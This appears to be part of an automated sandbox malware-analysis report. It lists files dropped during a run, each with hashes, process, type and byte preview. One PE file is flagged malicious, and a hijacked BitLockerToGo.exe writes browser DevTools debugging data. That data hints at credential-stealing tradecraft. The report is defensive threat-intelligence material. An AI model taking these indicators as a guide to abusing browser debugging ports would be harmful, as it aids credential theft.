                                                                                                                                                                                                                                                                                                                                                        SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f.................F..........o0M......`....@.................................E.Y....... ..............................t......P..$.............Y......................................|@......................P-.4............................text...TE..........................`.P`.data...(....`......................@.0..rdata..0....p......................@.0@.eh_fram@...........................@.0@.bss....p.............................0..idata..............................@.0..CRT................................@.0..tls.... ...........................@.0..vmp.$..l,......................... ..`.vmp.$......P-.....................@....vmp.$...X..`-...X................. ..`.rsrc...$....P........X.............@..@................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3806780796098534
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:SfNaoCMyLTECMtfNaoCkC0fNaoCXu6CXifNaoClIoU0UrU0U8ClQ:6NnClTECwNnCkCgNnCBCaNnClIv0UrUc
                                                                                                                                                                                                                                                                                                                                                        MD5:097B36C8C16817ABEA97DAFEB6918727
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EC0F60D916E28FD77A85F84571F2B8F02DA0597
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CD798687BA7D0DAA7AD5CC58800E7B2F2E3316DD1BA1F46F510D6DFDDFE86CE2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F6423F5FE37DBF832F6AFF95294E13C4C7DE3669BC026C19FC8013FE2467E8B56473E2BCB1FC5C9BF44B3F0BBAF86FDBB4BD987F3B6984DD3BB7160CFD5F91A3
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6C67B495C8BF1ADA4E50E4131357A8ED",.. "id": "6C67B495C8BF1ADA4E50E4131357A8ED",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6C67B495C8BF1ADA4E50E4131357A8ED"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/BFC95E20B0E00403472B25984A538B52",.. "id": "BFC95E20B0E00403472B25984A538B52",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/BFC95E20B0E00403472B25984A538B52"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                                                                                                                                                                                                                                        MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                                                                                                                                                                                                                                        SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                                                                                                                                                                                                                                        SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@...e................................................@..........

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2f8cc199-aef8-4d00-b4d0-8b6c0492f6a8.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\32a53432-937a-4c06-88cf-0daa7d8671f7.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag254x4b.mpj.ps1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqkceyp0.zi5.ps1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igjgr3kl.lhc.psm1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2djnujs.akq.psm1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cceb290d-fd5b-4241-b663-ed317efb5782.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):135771
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                                                                                                                                                        MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                                                                                                                                                        SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                                                                                                                                                        SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2110
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.402143967570735
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrs:8e2Fa116uCntc5toYm+LzM
                                                                                                                                                                                                                                                                                                                                                        MD5:6BCCEE33507C585032A442CBBD4689A6
                                                                                                                                                                                                                                                                                                                                                        SHA1:E382CDEA3F6AE63027A0FCFFD86B348085A12320
                                                                                                                                                                                                                                                                                                                                                        SHA-256:20D4E39792239C5A7FD0D384C94492A084DF1091CE4857A1498C4AF70798B433
                                                                                                                                                                                                                                                                                                                                                        SHA-512:78BA801D1534A7DC40DF997F2E08C920E1F133AF8CED2603408E0A2FF286DCFE7988F5C3DFA86E459D8E4EF57B16F886444E8F732F419C9CD0F6170959F9FDA2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:lLY:2
                                                                                                                                                                                                                                                                                                                                                        MD5:D92901AD94EEEC0DB00FFC7D01C4762F
                                                                                                                                                                                                                                                                                                                                                        SHA1:6A1D130D1C5D5A394C539244959E6B025E7D9519
                                                                                                                                                                                                                                                                                                                                                        SHA-256:00EC65B4A7A23368306F2F2961DB562F7AA152A0D9157D14D7B3230356AA50EA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CBE09C283736B9503B0415B4A6FFBF6ED8E531387132955AB1AC70F37C0E2C3BB0D4B2C20D9194F8E62A779D73641F4E42E2EFDC39DC46577D5A7C5603FD015E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ed74c94f-c30d-4c2b-88d7-5beb7ff71d01.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
